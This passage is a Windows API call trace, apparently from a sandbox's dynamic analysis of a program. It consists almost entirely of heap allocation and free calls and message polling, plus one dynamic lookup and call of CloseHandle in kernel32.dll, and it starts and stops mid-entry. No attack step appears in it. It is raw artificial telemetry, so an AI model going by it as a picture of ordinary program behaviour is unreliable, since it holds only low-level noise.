returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0184.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0184.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0184.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.136] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0184.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.136] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0184.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0184.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0184.139] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0184.139] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0184.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0184.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0184.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0184.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0184.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0184.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0184.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0184.140] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0184.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0184.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0184.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0184.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0184.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0184.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0184.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0184.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0184.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0184.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.142] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0184.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0184.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba330, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0184.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.143] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0184.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0184.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0184.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0184.143] CloseHandle (hObject=0x120) returned 1 [0184.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0184.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0184.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0184.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0184.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0184.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0184.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0184.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0184.146] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.147] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0184.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.147] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0184.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 